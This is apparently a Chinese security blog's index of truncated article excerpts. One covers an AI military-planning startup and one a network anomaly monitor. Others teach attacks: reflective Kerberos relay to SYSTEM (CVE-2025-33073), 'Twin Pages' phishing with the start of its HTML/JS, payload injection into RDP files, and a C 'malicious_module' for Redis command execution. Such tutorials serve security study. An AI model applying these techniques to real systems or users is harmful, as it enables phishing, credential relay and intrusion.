AI+军用有没有搞头

导语 在过去的二十年间,技术的迭代速度与冲突形态的演变,已远远超越了传统国防政策与军事流程的适应步伐。为了应对这一挑战,一家名为 Sandtable 的新兴国防科技公司,正通过其创新的人工智能平台,为作战规划的现代化注入新的活力。通过深度融合 AI、人类判断与沉浸式三维地理空间技术,Sandtable 旨在重塑军事决策的速度、精度与深度。 https://vimeo.com/1155108047?fl=pl&fe=cm Sandtable 传统的军事规划、协同与推演,在很大程度上仍依赖于二维图像、电子表格、纸质文档,乃至实体的沙盘。这种模式不仅效率低下,而且将关键决策人员集中于同一物理空间,本身就构成了巨大的安全风险。 在2024 年,由美国陆军退伍军人和研究人员组成的 Sandtable 公司,敏锐地洞察到了这一痛点。他们认识到,现代战争的要素——无论是无人机、反无人机技术,还是电磁频谱战——都真实存在于三维空间之中。因此,任何作战规划都必须能够真实地复现这个三维世界。 “我们所模拟和规划的一切,都发生在现实的三维空间里,我们必须有能力再现这个现实,” Sandtable 的首席运营官 Brady Moore 指出,“而这,正是我们需要 Cesium 的原因。” Sandtable 的核心理念,是将时间动态的三维地理空间技术引入军事规划的核心。其平台致力于打造一个交互式的、融合多源异构数据的作战环境,支持人类指挥团队与自主系统(如无人机集群)在任何地点进行协同规划与评估。 https://vimeo.com/1155158284?fl=pl&fe=cm AI + 3D Sandtable 的解决方案通过其两大核心原型产品——Mentat 和 Navigator——将人工智能与人类判断力相结合,旨在加速军事决策流程 (Military Decision-Making Process, MDMP) 的关键阶段。 Mentat 技术栈: 基于 CesiumJS 构建。 功能: Mentat 是一个作战方案 (Course-of-Action, COA) 的快速开发与分析平台。它能够在一个标准浏览器中,将书面命令、概念草图以及各类开放数据集(如土壤密度与成分数据)叠加在真实世界的三维地形之上。 AI 赋能: 借助 AI,该平台能够帮助参谋人员快速解析战场模式、对比多种行动方案的优劣、并对关键假设进行压力测试,从而让指挥官能将精力集中在最需要人类判断的环节。 Navigator 技术栈: 基于 Cesium for Unity 构建。 功能: Navigator 提供了一个共享的虚拟环境,支持身处各地的参与者通过多种设备(从桌面到…

Traffic-monitor—使用机器学习和统计模型检测网络异常的可视化工具

前言 传统 IDS/IPS 规则关注已知攻击模式,难以发现新型或隐蔽的异常。 传统的工具,如 netstat 或 lsof,虽然功能强大,但命令行输出不够直观;而像 Wireshark 这样的重量级工具,虽然能捕获每一个数据包,但对于只想快速查看实时连接状态的场景来说,又显得有些“杀鸡用牛刀”。 我们开发的全新开源项目——Traffic-monitor,它就可以满足o( ̄︶ ̄)o! GitHub项目地址: https://github.com/GhostWolfLab/Traffic-monitor Traffic-monitor Traffic-monitor 是一款现代化的网络流量监控工具,它旨在提供一个清晰、实时且用户友好的界面,使其可以一目了然地掌握系统的所有网络活动。它将复杂的网络连接信息,通过一个Web界面,直观地呈现在网页中。 亮点 实时监控:Traffic-monitor通过一个Web UI实时展示所有网络连接。 跨平台:只需要python环境,无论是Windows、Linux还是MacOS,Traffic-monitor都能在系统上原生运行。 多种检测方法: Isolation Forest: 基于孤立森林的异常检测 统计模型: 基于历史基线的3-sigma规则检测 Autoencoder: 深度学习异常检测 PCAP分析:支持上传PCAP文件进行分析。 使用 克隆或进入项目目录 cd Traffic-monitor 安装依赖 pip install -r requirements.txt 启动服务 python app.py 访问界面 打开浏览器访问: http://localhost:5000 实时监听 注:需要管理员权限启动 选择检测方法(Isolation Forest、统计模型 或 Autoencoder) 选择网络接口(或留空自动选择) 可选:设置BPF过滤器(如 tcp) 点击“开始监听”按钮 实时查看检测到的异常流量 分析PCAP文件…

绕过SMB强制签名执行反射攻击

简介 在信息安全领域,已修复漏洞的再次出现是一个持续存在的挑战。 本文在对 Active Directory 环境中的中继攻击进行深入研究时,发现了一种新型的反射式 Kerberos 中继攻击。自微软发布 MS08-068 补丁以阻止 NTLM 消息被中继回源主机后,类似的反射攻击被认为已得到有效缓解。然而,我们的研究证实,通过将攻击向量从 NTLM 转向 Kerberos,可以绕过这一经典防护机制。 研究表明,若攻击者能强制任意 Windows 主机通过 SMB 向其发起 Kerberos 身份验证,便可截获并中继该主机的计算机账户票证,攻击主机自身的服务,最终利用一个提权漏洞获得 NT AUTHORITYSYSTEM 级别的特权,并实现远程代码执行 (RCE)。 要了解该反射攻击我们首先需要了解 CVE-2025-33073 – 反射型 Kerberos 中继攻击漏洞。 反射型 Kerberos 中继攻击 2025年1月,RedTeam Pentesting 在一次深入研究中,偶然发现了一个潜藏在 Kerberos 认证机制中的严重漏洞——命名为“反射式 Kerberos 中继攻击”,并获得了CVE编号CVE-2025-33073。在将详尽的白皮书提交给微软后,官方已于2025年6月10日发布了修复程序。 攻击的起点非常经典:我们强制一台 Windows 主机通过 SMB 连接到我们的攻击系统,并使用 Kerberos 进行身份验证。按照传统的中继攻击逻辑,当我们把这枚 Kerberos 票证再“反射”回主机自身时,我们本以为最多只能拿到一个普通的计算机账户会话。但一个惊人的结果出现了——我们建立的 SMB 会话,其权限竟然直接跃升至 NT AUTHORITYSYSTEM。这个意料之外的权限提升,将一个看似普通的认证中继,变成了一把能够执行任意命令、完全控制系统的钥匙。…

页面双生

简介 页面双生(Twin Pages)是一种网络钓鱼技术,攻击者通过创建两个相互依赖的网页——主页面和副页面,只有当目标同时打开这两个页面时,副页面才会动态渲染成钓鱼的登录网页。如果主页面或副页面单独打开,则显示正常的页面。页面双生技术利用了目标的浏览习惯和行为模式,使其难以察觉到正在进行的攻击。 构建页面 页面双生技术需要创建两个相互依赖的网页,只有当目标同时打开这两个页面时,副页面才会动态渲染成钓鱼的登录网页。 因此,我们首先需要编写main.html文件作为主页面。 <!DOCTYPE html> <html> <head>     <title>Main Page</title>     <script>         functionmarkMainPageOpen() {             window.name = 'main';             localStorage.setItem('mainPageOpened', 'true');         }         functioncheckTwinPage() {             if (localStorage.getItem('twinPageOpened') === 'true') {…

创建RDP有效负载

前言 随着网络钓鱼技术的不断发展,攻击手段也变得越来越复杂和隐蔽且攻击者已经熟练地利用 Windows 的标准功能来传递恶意负载。虽然这些方法看似巧妙,但实际上存在潜在的操作安全风险。这些技术可能会无意中暴露攻击者的行踪,使防御者能够发现并有效应对。 在现今环境中,尖端的预防技术已成为常态,成功传递恶意负载而不引起警报已成为一门真正的艺术。 而通过 Windows 内部服务配置文件及其注入内容的技术可以很适合的达到这一点。在本篇文章中,我们将以研究 RDP 连接文件为例。要注入RDP有效负载,关键在于如何确保 RDP 连接文件在嵌入内容后仍能正常工作。 文件结构 RDP 连接文件,通常以.rdp结尾,是一种配置文件,用于简化与 Windows 系统的远程桌面连接。这个文件包含多个参数,每个参数都对远程连接的设置和行为起到重要作用。 文件结构的细节可能因RDP客户端版本和配置有些差异,但通常存在以下组件。 screen mode id:i:2:屏幕模式 ID,2 表示全屏模式。 use multimon:i:0:是否使用多显示器,0 表示不使用。 desktopwidth:i:2560:远程桌面的宽度,单位为像素。 desktopheight:i:1440:远程桌面的高度,单位为像素。 session bpp:i:32:会话的颜色深度,32 表示 32 位色。 winposstr:s:0,3,0,0,800,600:窗口位置和大小参数。 compression:i:1:是否启用压缩,1 表示启用。 keyboardhook:i:2:键盘钩子模式,2 表示在远程会话中启用。 audiocapturemode:i:0:音频捕获模式,0 表示禁用。 videoplaybackmode:i:1:视频播放模式,1 表示启用。 connection type:i:7:连接类型,7 表示高质量宽带。 networkautodetect:i:1:是否自动检测网络,1 表示启用。 bandwidthautodetect:i:1:是否自动检测带宽,1 表示启用。 displayconnectionbar:i:1:是否显示连接栏,1 表示启用。 enableworkspacereconnect:i:0:是否启用工作区重新连接,0 表示禁用。 disable wallpaper:i:0:是否禁用壁纸,0…

Redis编写自定义模块

简介 Redis自定义模块允许用户扩展Redis的功能,添加新的命令和数据类型。这种灵活性使得Redis不仅仅是一个键值存储,还可以用于更复杂的应用场景。然而,这也带来了潜在的安全风险,攻击者可能利用这些自定义模块执行恶意命令。下面是关于Redis自定义模块执行命令的介绍和漏洞利用方法。 Redis自定义模块介绍 Redis自定义模块是从Redis 4.0版本开始引入的,允许开发者编写自己的模块并加载到Redis中。模块可以用C语言编写,并编译成动态库(.so文件),然后通过Redis命令加载。 创建模块文件:编写一个简单的C语言文件,例如malicious_module.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include "redismodule.h" int MaliciousCommand(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) { RedisModule_ReplyWithSimpleString(ctx, "Malicious code executed!"); return REDISMODULE_OK; } int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) { if (RedisModule_Init(ctx, "malicious_module", 1, REDISMODULE_APIVER_1) == REDISMODULE_ERR) { return REDISMODULE_ERR; } if (RedisModule_CreateCommand(ctx, "malicious_command", MaliciousCommand, "write", 1, 1,…